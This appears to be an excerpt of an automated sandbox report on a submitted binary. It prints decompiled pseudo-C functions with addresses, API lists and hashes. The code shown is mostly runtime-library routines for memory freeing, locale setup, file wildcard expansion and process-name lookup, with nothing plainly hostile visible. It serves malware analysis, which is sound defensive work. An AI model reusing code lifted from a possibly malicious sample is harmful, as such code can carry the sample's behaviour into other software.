                    • API String ID: 336800556-0
                    • Opcode ID: 2bbc338ae81509bc63291bb21a6a27f62bc6edff3a5ec89e69319637191320e4
                    • Instruction ID: 9ac5ca95962a4110d8aefbd9c9d938e27f2ac439318883fd382f084f0ce2bb7e
                    • Opcode Fuzzy Hash: 2bbc338ae81509bc63291bb21a6a27f62bc6edff3a5ec89e69319637191320e4
                    • Instruction Fuzzy Hash: 660171A2A017167B372116BBAC8CC7B6A6DEEC2FA5315016EFD04D2201DE69CC0291B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00410F6C(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                    				void* _v8;
                    				char _v12;
                    				char _v24;
                    				intOrPtr _v36;
                    				intOrPtr* _t34;
                    				void* _t39;
                    				intOrPtr* _t42;
                    				intOrPtr* _t44;
                    
                    				E00434D15( &_v12, 0);
                    				_t39 =  *0x475b10;
                    				_v8 = _t39;
                    				_t42 = E0040DF9B(_a4, E0040DECA(0x475d00));
                    				if(_t42 != 0) {
                    					L5:
                    					E00434D6D( &_v12);
                    					return _t42;
                    				} else {
                    					if(_t39 == 0) {
                    						__eflags = E00411030(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                    						if(__eflags == 0) {
                    							_t34 =  &_v24;
                    							E0040DD96(_t34);
                    							E00438B36( &_v24, 0x46ddac);
                    							asm("int3");
                    							_push(_t42);
                    							_t44 = _t34;
                    							E0040DC90(_t34, _v36);
                    							 *_t44 = 0x459314;
                    							return _t44;
                    						} else {
                    							_t42 = _v8;
                    							 *0x475b10 = _t42;
                    							 *((intOrPtr*)( *_t42 + 4))();
                    							E00434F26(__eflags, _t42);
                    							goto L5;
                    						}
                    					} else {
                    						_t42 = _t39;
                    						goto L5;
                    					}
                    				}
                    			}











                    0x00410f79
                    0x00410f7e
                    0x00410f89
                    0x00410f9a
                    0x00410f9e
                    0x00410fd2
                    0x00410fd5
                    0x00410fe1
                    0x00410fa0
                    0x00410fa2
                    0x00410fb6
                    0x00410fb9
                    0x00410fe2
                    0x00410fe5
                    0x00410ff3
                    0x00410ff8
                    0x00410ff9
                    0x00410ffe
                    0x00411000
                    0x00411005
                    0x0041100e
                    0x00410fbb
                    0x00410fbb
                    0x00410fc0
                    0x00410fc8
                    0x00410fcc
                    0x00000000
                    0x00410fd1
                    0x00410fa4
                    0x00410fa4
                    0x00000000
                    0x00410fa4
                    0x00410fa2

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410F79
                    • int.LIBCPMT ref: 00410F8C
                      • Part of subcall function 0040DECA: std::_Lockit::_Lockit.LIBCPMT ref: 0040DEDB
                      • Part of subcall function 0040DECA: std::_Lockit::~_Lockit.LIBCPMT ref: 0040DEF5
                    • std::_Facet_Register.LIBCPMT ref: 00410FCC
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410FD5
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410FF3
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                    • String ID:
                    • API String ID: 2536120697-0
                    • Opcode ID: aaf7ee2261f56a2bb36fa57901883926cf894d160a52563b11572542cc915ba4
                    • Instruction ID: 6ff4557ec4e35cb0e40848854b3b189a9c6424da693c85efa2d3172acc1ea9a8
                    • Opcode Fuzzy Hash: aaf7ee2261f56a2bb36fa57901883926cf894d160a52563b11572542cc915ba4
                    • Instruction Fuzzy Hash: D1110A36D00114ABC720FFA5D8058DEB7689F84364F20456FF8057B291DBB89E86C7D8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E00447C89(void* __ecx) {
                    				void* __esi;
                    				intOrPtr _t2;
                    				void* _t4;
                    				void* _t10;
                    				void* _t11;
                    				void* _t13;
                    				void* _t15;
                    				long _t16;
                    
                    				_t11 = __ecx;
                    				_t16 = GetLastError();
                    				_t10 = 0;
                    				_t2 =  *0x4701dc; // 0x9
                    				_t19 = _t2 - 0xffffffff;
                    				if(_t2 == 0xffffffff) {
                    					L2:
                    					_t15 = E004454E5(_t11, 1, 0x364);
                    					_pop(_t13);
                    					if(_t15 != 0) {
                    						_t4 = E00448221(_t13, _t16, __eflags,  *0x4701dc, _t15);
                    						__eflags = _t4;
                    						if(_t4 != 0) {
                    							E00447A77(_t13, _t15, 0x471664);
                    							E00446172(_t10);
                    							__eflags = _t15;
                    							if(_t15 != 0) {
                    								goto L9;
                    							} else {
                    								goto L8;
                    							}
                    						} else {
                    							_push(_t15);
                    							goto L4;
                    						}
                    					} else {
                    						_push(_t10);
                    						L4:
                    						E00446172();
                    						L8:
                    						SetLastError(_t16);
                    					}
                    				} else {
                    					_t15 = E004481CB(_t11, _t16, _t19, _t2);
                    					if(_t15 != 0) {
                    						L9:
                    						SetLastError(_t16);
                    						_t10 = _t15;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    				return _t10;
                    			}











                    0x00447c89
                    0x00447c94
                    0x00447c96
                    0x00447c98
                    0x00447c9d
                    0x00447ca0
                    0x00447cae
                    0x00447cba
                    0x00447cbd
                    0x00447cc0
                    0x00447cd2
                    0x00447cd7
                    0x00447cd9
                    0x00447ce4
                    0x00447cea
                    0x00447cf2
                    0x00447cf4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447cdb
                    0x00447cdb
                    0x00000000
                    0x00447cdb
                    0x00447cc2
                    0x00447cc2
                    0x00447cc3
                    0x00447cc3
                    0x00447cf6
                    0x00447cf7
                    0x00447cf7
                    0x00447ca2
                    0x00447ca8
                    0x00447cac
                    0x00447cff
                    0x00447d00
                    0x00447d06
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447cac
                    0x00447d0d

                    APIs
                    • GetLastError.KERNEL32(004742C0,00000000,00000000,0043B64B,00000000,?,?,0043B6CF,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00447C8E
                    • _free.LIBCMT ref: 00447CC3
                    • _free.LIBCMT ref: 00447CEA
                    • SetLastError.KERNEL32(00000000,?,0040F60D), ref: 00447CF7
                    • SetLastError.KERNEL32(00000000,?,0040F60D), ref: 00447D00
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: 2dc02371c072f0153664e43aeca97e14838adc81bb59c476d66507c7a5bfcccc
                    • Instruction ID: d7490b03c6d229d464fcf81f6982e615573adb694e174246dd56d36c046aeae6
                    • Opcode Fuzzy Hash: 2dc02371c072f0153664e43aeca97e14838adc81bb59c476d66507c7a5bfcccc
                    • Instruction Fuzzy Hash: AB01D632109B016BF31266756D86D6B262ADBC2776731042FF805B2292DF7CC807416D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 45%
                    			E0041BC72(void* __ecx, long __edx) {
                    				char _v524;
                    				void* __ebx;
                    				void* __ebp;
                    				int _t4;
                    				void* _t6;
                    				long _t14;
                    				int _t19;
                    				void* _t20;
                    				void* _t21;
                    
                    				_t18 = __edx;
                    				_t14 = __edx;
                    				_t20 = __ecx;
                    				_t4 = OpenProcess(0x1000, 0, __edx);
                    				_t19 = _t4;
                    				if(_t19 != 0) {
                    					L3:
                    					_t6 =  *0x473b0c(_t19,  &_v524, 0x104);
                    					_push(_t19);
                    					if(_t6 != 0) {
                    						CloseHandle();
                    						E0041BAB0( &_v524);
                    						_push( &_v524);
                    					} else {
                    						CloseHandle();
                    						goto L2;
                    					}
                    				} else {
                    					_t19 = OpenProcess(0x400, _t4, _t14);
                    					if(_t19 != 0) {
                    						goto L3;
                    					} else {
                    						L2:
                    						_push(0x46b928);
                    					}
                    				}
                    				E0040417E(_t14, _t20, _t18, _t21);
                    				return _t20;
                    			}












                    0x0041bc72
                    0x0041bc7e
                    0x0041bc80
                    0x0041bc8a
                    0x0041bc90
                    0x0041bc94
                    0x0041bcb0
                    0x0041bcbd
                    0x0041bcc3
                    0x0041bcc6
                    0x0041bcd0
                    0x0041bcdc
                    0x0041bce7
                    0x0041bcc8
                    0x0041bcc8
                    0x00000000
                    0x0041bcc8
                    0x0041bc96
                    0x0041bca3
                    0x0041bca7
                    0x00000000
                    0x0041bca9
                    0x0041bca9
                    0x0041bca9
                    0x0041bca9
                    0x0041bca7
                    0x0041bcea
                    0x0041bcf7

                    APIs
                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041BC8A
                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041BC9D
                    • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041BCBD
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041BCC8
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041BCD0
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseHandleOpen$FileImageName
                    • String ID:
                    • API String ID: 2951400881-0
                    • Opcode ID: 31655115f8ee11b087bcfca92917f72a1ea7db69e1baec7a8fcdfb69fef9c9ee
                    • Instruction ID: 1fdde0c1a850e70a9c41ba856e9daee0b7c97fdd674a552daa5b348761059d48
                    • Opcode Fuzzy Hash: 31655115f8ee11b087bcfca92917f72a1ea7db69e1baec7a8fcdfb69fef9c9ee
                    • Instruction Fuzzy Hash: 270149712403196BD21053949C4AFFBB66CDB44792F00006FFA08E2292FF749C8146EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004503CC(intOrPtr* _a4) {
                    				intOrPtr _t6;
                    				intOrPtr* _t21;
                    				void* _t23;
                    				void* _t24;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t21 = _a4;
                    				if(_t21 != 0) {
                    					_t23 =  *_t21 -  *0x470188; // 0x470180
                    					if(_t23 != 0) {
                    						E00446172(_t7);
                    					}
                    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x47018c; // 0x47165c
                    					if(_t24 != 0) {
                    						E00446172(_t8);
                    					}
                    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x470190; // 0x47165c
                    					if(_t25 != 0) {
                    						E00446172(_t9);
                    					}
                    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x4701b8; // 0x470184
                    					if(_t26 != 0) {
                    						E00446172(_t10);
                    					}
                    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                    					_t27 = _t6 -  *0x4701bc; // 0x471660
                    					if(_t27 != 0) {
                    						return E00446172(_t6);
                    					}
                    				}
                    				return _t6;
                    			}










                    0x004503d2
                    0x004503d7
                    0x004503db
                    0x004503e1
                    0x004503e4
                    0x004503e9
                    0x004503ed
                    0x004503f3
                    0x004503f6
                    0x004503fb
                    0x004503ff
                    0x00450405
                    0x00450408
                    0x0045040d
                    0x00450411
                    0x00450417
                    0x0045041a
                    0x0045041f
                    0x00450420
                    0x00450423
                    0x00450429
                    0x00000000
                    0x00450431
                    0x00450429
                    0x00450434

                    APIs
                    • _free.LIBCMT ref: 004503E4
                      • Part of subcall function 00446172: RtlFreeHeap.NTDLL(00000000,00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000), ref: 00446188
                      • Part of subcall function 00446172: GetLastError.KERNEL32(00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000,00000000), ref: 0044619A
                    • _free.LIBCMT ref: 004503F6
                    • _free.LIBCMT ref: 00450408
                    • _free.LIBCMT ref: 0045041A
                    • _free.LIBCMT ref: 0045042C
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 3d8eba958f8ef0acd17e47ce3694ae24b6bcae407c0737540dbbb89a7bcc6dbb
                    • Instruction ID: fa903ec892ebef9263c6769a39691cc663d1cc61233b8534ccb01e41365e02d6
                    • Opcode Fuzzy Hash: 3d8eba958f8ef0acd17e47ce3694ae24b6bcae407c0737540dbbb89a7bcc6dbb
                    • Instruction Fuzzy Hash: ACF03632505200AB9621EB59E9C1C1B73EAEA03716795881FF949D7653CB39FCC18A5C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00443A59(signed int __ecx) {
                    				intOrPtr _t7;
                    
                    				asm("lock xadd [eax], ecx");
                    				if((__ecx | 0xffffffff) == 0) {
                    					_t7 =  *0x4709a0; // 0x7b27a8
                    					if(_t7 != 0x470780) {
                    						E00446172(_t7);
                    						 *0x4709a0 = 0x470780;
                    					}
                    				}
                    				E00446172( *0x471a18);
                    				 *0x471a18 = 0;
                    				E00446172( *0x471a1c);
                    				 *0x471a1c = 0;
                    				E00446172( *0x471a48);
                    				 *0x471a48 = 0;
                    				E00446172( *0x471a4c);
                    				 *0x471a4c = 0;
                    				return 1;
                    			}




                    0x00443a62
                    0x00443a66
                    0x00443a68
                    0x00443a74
                    0x00443a77
                    0x00443a7d
                    0x00443a7d
                    0x00443a74
                    0x00443a89
                    0x00443a96
                    0x00443a9c
                    0x00443aa7
                    0x00443aad
                    0x00443ab8
                    0x00443abe
                    0x00443ac6
                    0x00443acf

                    APIs
                    • _free.LIBCMT ref: 00443A77
                      • Part of subcall function 00446172: RtlFreeHeap.NTDLL(00000000,00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000), ref: 00446188
                      • Part of subcall function 00446172: GetLastError.KERNEL32(00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000,00000000), ref: 0044619A
                    • _free.LIBCMT ref: 00443A89
                    • _free.LIBCMT ref: 00443A9C
                    • _free.LIBCMT ref: 00443AAD
                    • _free.LIBCMT ref: 00443ABE
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: c72fca27617b7d2f91fe97f9ebe6dbd836f1ff32662b4ccb858702b60f78a08b
                    • Instruction ID: 4b020456b6777a424bbd613cb0aec67ff6bd9813cfadda5ae35444b640ae5837
                    • Opcode Fuzzy Hash: c72fca27617b7d2f91fe97f9ebe6dbd836f1ff32662b4ccb858702b60f78a08b
                    • Instruction Fuzzy Hash: 14F0F4F58135109BE766AF2DBC4240A3771A705715341412BF45CA6B76C73909C2DFCE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E0044E0F9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                    				intOrPtr _v0;
                    				char _v6;
                    				char _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v36;
                    				intOrPtr* _v64;
                    				intOrPtr _v96;
                    				intOrPtr* _v100;
                    				CHAR* _v104;
                    				signed int _v116;
                    				char _v290;
                    				signed int _v291;
                    				struct _WIN32_FIND_DATAA _v336;
                    				union _FINDEX_INFO_LEVELS _v340;
                    				signed int _v344;
                    				signed int _v348;
                    				intOrPtr _v440;
                    				intOrPtr* _t80;
                    				signed int _t82;
                    				signed int _t87;
                    				signed int _t91;
                    				signed int _t93;
                    				signed int _t95;
                    				signed int _t96;
                    				signed int _t100;
                    				signed int _t103;
                    				signed int _t108;
                    				signed int _t111;
                    				intOrPtr _t113;
                    				signed char _t115;
                    				union _FINDEX_INFO_LEVELS _t123;
                    				signed int _t128;
                    				signed int _t131;
                    				void* _t137;
                    				void* _t139;
                    				signed int _t140;
                    				signed int _t143;
                    				signed int _t145;
                    				signed int _t147;
                    				signed int* _t148;
                    				signed int _t151;
                    				void* _t154;
                    				CHAR* _t155;
                    				char _t158;
                    				char _t160;
                    				intOrPtr* _t163;
                    				void* _t164;
                    				intOrPtr* _t165;
                    				signed int _t167;
                    				void* _t169;
                    				intOrPtr* _t170;
                    				signed int _t174;
                    				signed int _t178;
                    				signed int _t179;
                    				intOrPtr* _t184;
                    				void* _t193;
                    				intOrPtr _t194;
                    				signed int _t196;
                    				signed int _t197;
                    				signed int _t199;
                    				signed int _t200;
                    				signed int _t202;
                    				union _FINDEX_INFO_LEVELS _t203;
                    				signed int _t208;
                    				signed int _t210;
                    				signed int _t211;
                    				void* _t213;
                    				intOrPtr _t214;
                    				void* _t215;
                    				signed int _t219;
                    				void* _t221;
                    				signed int _t222;
                    				void* _t223;
                    				void* _t224;
                    				void* _t225;
                    				signed int _t226;
                    				void* _t227;
                    				void* _t228;
                    
                    				_t80 = _a8;
                    				_t224 = _t223 - 0x20;
                    				if(_t80 != 0) {
                    					_t208 = _a4;
                    					_t160 = 0;
                    					 *_t80 = 0;
                    					_t199 = 0;
                    					_t151 = 0;
                    					_v36 = 0;
                    					_v336.cAlternateFileName = 0;
                    					_v28 = 0;
                    					__eflags =  *_t208;
                    					if( *_t208 == 0) {
                    						L9:
                    						_v12 = _v12 & 0x00000000;
                    						_t82 = _t151 - _t199;
                    						_v8 = _t160;
                    						_t191 = (_t82 >> 2) + 1;
                    						__eflags = _t151 - _t199;
                    						_v16 = (_t82 >> 2) + 1;
                    						asm("sbb esi, esi");
                    						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                    						__eflags = _t210;
                    						if(_t210 != 0) {
                    							_t197 = _t199;
                    							_t158 = _t160;
                    							do {
                    								_t184 =  *_t197;
                    								_t17 = _t184 + 1; // 0x1
                    								_v8 = _t17;
                    								do {
                    									_t143 =  *_t184;
                    									_t184 = _t184 + 1;
                    									__eflags = _t143;
                    								} while (_t143 != 0);
                    								_t158 = _t158 + 1 + _t184 - _v8;
                    								_t197 = _t197 + 4;
                    								_t145 = _v12 + 1;
                    								_v12 = _t145;
                    								__eflags = _t145 - _t210;
                    							} while (_t145 != _t210);
                    							_t191 = _v16;
                    							_v8 = _t158;
                    							_t151 = _v336.cAlternateFileName;
                    						}
                    						_t211 = E004430AE(_t191, _v8, 1);
                    						_t225 = _t224 + 0xc;
                    						__eflags = _t211;
                    						if(_t211 != 0) {
                    							_t87 = _t211 + _v16 * 4;
                    							_v20 = _t87;
                    							_t192 = _t87;
                    							_v16 = _t87;
                    							__eflags = _t199 - _t151;
                    							if(_t199 == _t151) {
                    								L23:
                    								_t200 = 0;
                    								__eflags = 0;
                    								 *_a8 = _t211;
                    								goto L24;
                    							} else {
                    								_t93 = _t211 - _t199;
                    								__eflags = _t93;
                    								_v24 = _t93;
                    								do {
                    									_t163 =  *_t199;
                    									_v12 = _t163 + 1;
                    									do {
                    										_t95 =  *_t163;
                    										_t163 = _t163 + 1;
                    										__eflags = _t95;
                    									} while (_t95 != 0);
                    									_t164 = _t163 - _v12;
                    									_t35 = _t164 + 1; // 0x1
                    									_t96 = _t35;
                    									_push(_t96);
                    									_v12 = _t96;
                    									_t100 = E00441413(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                    									_t225 = _t225 + 0x10;
                    									__eflags = _t100;
                    									if(_t100 != 0) {
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										E0043B6DD();
                    										asm("int3");
                    										_t221 = _t225;
                    										_push(_t164);
                    										_t165 = _v64;
                    										_t47 = _t165 + 1; // 0x1
                    										_t193 = _t47;
                    										do {
                    											_t103 =  *_t165;
                    											_t165 = _t165 + 1;
                    											__eflags = _t103;
                    										} while (_t103 != 0);
                    										_push(_t199);
                    										_t202 = _a8;
                    										_t167 = _t165 - _t193 + 1;
                    										_v12 = _t167;
                    										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                    										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                    											_push(_t151);
                    											_t50 = _t202 + 1; // 0x1
                    											_t154 = _t50 + _t167;
                    											_t213 = E004454E5(_t167, _t154, 1);
                    											_t169 = _t211;
                    											__eflags = _t202;
                    											if(_t202 == 0) {
                    												L34:
                    												_push(_v12);
                    												_t154 = _t154 - _t202;
                    												_t108 = E00441413(_t169, _t213 + _t202, _t154, _v0);
                    												_t226 = _t225 + 0x10;
                    												__eflags = _t108;
                    												if(__eflags != 0) {
                    													goto L37;
                    												} else {
                    													_t137 = E0044E4C8(_a12, __eflags, _t213);
                    													E00446172(0);
                    													_t139 = _t137;
                    													goto L36;
                    												}
                    											} else {
                    												_push(_t202);
                    												_t140 = E00441413(_t169, _t213, _t154, _a4);
                    												_t226 = _t225 + 0x10;
                    												__eflags = _t140;
                    												if(_t140 != 0) {
                    													L37:
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													E0043B6DD();
                    													asm("int3");
                    													_push(_t221);
                    													_t222 = _t226;
                    													_t227 = _t226 - 0x150;
                    													_t111 =  *0x47000c; // 0xc3a97826
                    													_v116 = _t111 ^ _t222;
                    													_t170 = _v100;
                    													_push(_t154);
                    													_t155 = _v104;
                    													_push(_t213);
                    													_t214 = _v96;
                    													_push(_t202);
                    													_v440 = _t214;
                    													while(1) {
                    														__eflags = _t170 - _t155;
                    														if(_t170 == _t155) {
                    															break;
                    														}
                    														_t113 =  *_t170;
                    														__eflags = _t113 - 0x2f;
                    														if(_t113 != 0x2f) {
                    															__eflags = _t113 - 0x5c;
                    															if(_t113 != 0x5c) {
                    																__eflags = _t113 - 0x3a;
                    																if(_t113 != 0x3a) {
                    																	_t170 = E00455C90(_t155, _t170);
                    																	continue;
                    																}
                    															}
                    														}
                    														break;
                    													}
                    													_t194 =  *_t170;
                    													__eflags = _t194 - 0x3a;
                    													if(_t194 != 0x3a) {
                    														L47:
                    														_t203 = 0;
                    														__eflags = _t194 - 0x2f;
                    														if(_t194 == 0x2f) {
                    															L51:
                    															_t115 = 1;
                    															__eflags = 1;
                    														} else {
                    															__eflags = _t194 - 0x5c;
                    															if(_t194 == 0x5c) {
                    																goto L51;
                    															} else {
                    																__eflags = _t194 - 0x3a;
                    																if(_t194 == 0x3a) {
                    																	goto L51;
                    																} else {
                    																	_t115 = 0;
                    																}
                    															}
                    														}
                    														asm("sbb eax, eax");
                    														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                    														E004368A0(_t203,  &_v336, _t203, 0x140);
                    														_t228 = _t227 + 0xc;
                    														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                    														_t123 = _v340;
                    														__eflags = _t215 - 0xffffffff;
                    														if(_t215 != 0xffffffff) {
                    															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                    															__eflags = _t174;
                    															_v348 = _t174 >> 2;
                    															do {
                    																__eflags = _v336.cFileName - 0x2e;
                    																if(_v336.cFileName != 0x2e) {
                    																	L64:
                    																	_push(_t123);
                    																	_push(_v344);
                    																	_t123 =  &(_v336.cFileName);
                    																	_push(_t155);
                    																	_push(_t123);
                    																	L28();
                    																	_t228 = _t228 + 0x10;
                    																	__eflags = _t123;
                    																	if(_t123 != 0) {
                    																		goto L54;
                    																	} else {
                    																		goto L65;
                    																	}
                    																} else {
                    																	_t178 = _v291;
                    																	__eflags = _t178;
                    																	if(_t178 == 0) {
                    																		goto L65;
                    																	} else {
                    																		__eflags = _t178 - 0x2e;
                    																		if(_t178 != 0x2e) {
                    																			goto L64;
                    																		} else {
                    																			__eflags = _v290;
                    																			if(_v290 == 0) {
                    																				goto L65;
                    																			} else {
                    																				goto L64;
                    																			}
                    																		}
                    																	}
                    																}
                    																goto L58;
                    																L65:
                    																_t128 = FindNextFileA(_t215,  &_v336);
                    																__eflags = _t128;
                    																_t123 = _v340;
                    															} while (_t128 != 0);
                    															_t195 =  *_t123;
                    															_t179 = _v348;
                    															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                    															__eflags = _t179 - _t131;
                    															if(_t179 != _t131) {
                    																E004409E0(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0044E0E1);
                    															}
                    														} else {
                    															_push(_t123);
                    															_push(_t203);
                    															_push(_t203);
                    															_push(_t155);
                    															L28();
                    															L54:
                    															_t203 = _t123;
                    														}
                    														__eflags = _t215 - 0xffffffff;
                    														if(_t215 != 0xffffffff) {
                    															FindClose(_t215);
                    														}
                    													} else {
                    														__eflags = _t170 -  &(_t155[1]);
                    														if(_t170 ==  &(_t155[1])) {
                    															goto L47;
                    														} else {
                    															_push(_t214);
                    															_push(0);
                    															_push(0);
                    															_push(_t155);
                    															L28();
                    														}
                    													}
                    													L58:
                    													__eflags = _v16 ^ _t222;
                    													return E004349BB(_v16 ^ _t222);
                    												} else {
                    													goto L34;
                    												}
                    											}
                    										} else {
                    											_t139 = 0xc;
                    											L36:
                    											return _t139;
                    										}
                    									} else {
                    										goto L22;
                    									}
                    									goto L68;
                    									L22:
                    									_t196 = _v16;
                    									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                    									_t199 = _t199 + 4;
                    									_t192 = _t196 + _v12;
                    									_v16 = _t196 + _v12;
                    									__eflags = _t199 - _t151;
                    								} while (_t199 != _t151);
                    								goto L23;
                    							}
                    						} else {
                    							_t200 = _t199 | 0xffffffff;
                    							L24:
                    							E00446172(0);
                    							goto L25;
                    						}
                    					} else {
                    						while(1) {
                    							_v8 = 0x3f2a;
                    							_v6 = _t160;
                    							_t147 = E00455C50( *_t208,  &_v8);
                    							__eflags = _t147;
                    							if(_t147 != 0) {
                    								_push( &_v36);
                    								_push(_t147);
                    								_push( *_t208);
                    								L38();
                    								_t224 = _t224 + 0xc;
                    							} else {
                    								_t147 =  &_v36;
                    								_push(_t147);
                    								_push(0);
                    								_push(0);
                    								_push( *_t208);
                    								L28();
                    								_t224 = _t224 + 0x10;
                    							}
                    							_t200 = _t147;
                    							__eflags = _t200;
                    							if(_t200 != 0) {
                    								break;
                    							}
                    							_t208 = _t208 + 4;
                    							_t160 = 0;
                    							__eflags =  *_t208;
                    							if( *_t208 != 0) {
                    								continue;
                    							} else {
                    								_t151 = _v336.cAlternateFileName;
                    								_t199 = _v36;
                    								goto L9;
                    							}
                    							goto L68;
                    						}
                    						L25:
                    						E0044E4A3( &_v36);
                    						_t91 = _t200;
                    						goto L26;
                    					}
                    				} else {
                    					_t148 = E0043FFBD();
                    					_t219 = 0x16;
                    					 *_t148 = _t219;
                    					E0043B6B0();
                    					_t91 = _t219;
                    					L26:
                    					return _t91;
                    				}
                    				L68:
                    			}





















































































                    0x0044e0fe
                    0x0044e101
                    0x0044e107
                    0x0044e11f
                    0x0044e122
                    0x0044e126
                    0x0044e128
                    0x0044e12a
                    0x0044e12c
                    0x0044e12f
                    0x0044e132
                    0x0044e135
                    0x0044e137
                    0x0044e18f
                    0x0044e18f
                    0x0044e195
                    0x0044e197
                    0x0044e1a2
                    0x0044e1a6
                    0x0044e1a8
                    0x0044e1ab
                    0x0044e1af
                    0x0044e1af
                    0x0044e1b1
                    0x0044e1b3
                    0x0044e1b5
                    0x0044e1b7
                    0x0044e1b7
                    0x0044e1b9
                    0x0044e1bc
                    0x0044e1bf
                    0x0044e1bf
                    0x0044e1c1
                    0x0044e1c2
                    0x0044e1c2
                    0x0044e1cd
                    0x0044e1cf
                    0x0044e1d2
                    0x0044e1d3
                    0x0044e1d6
                    0x0044e1d6
                    0x0044e1da
                    0x0044e1dd
                    0x0044e1e0
                    0x0044e1e0
                    0x0044e1ee
                    0x0044e1f0
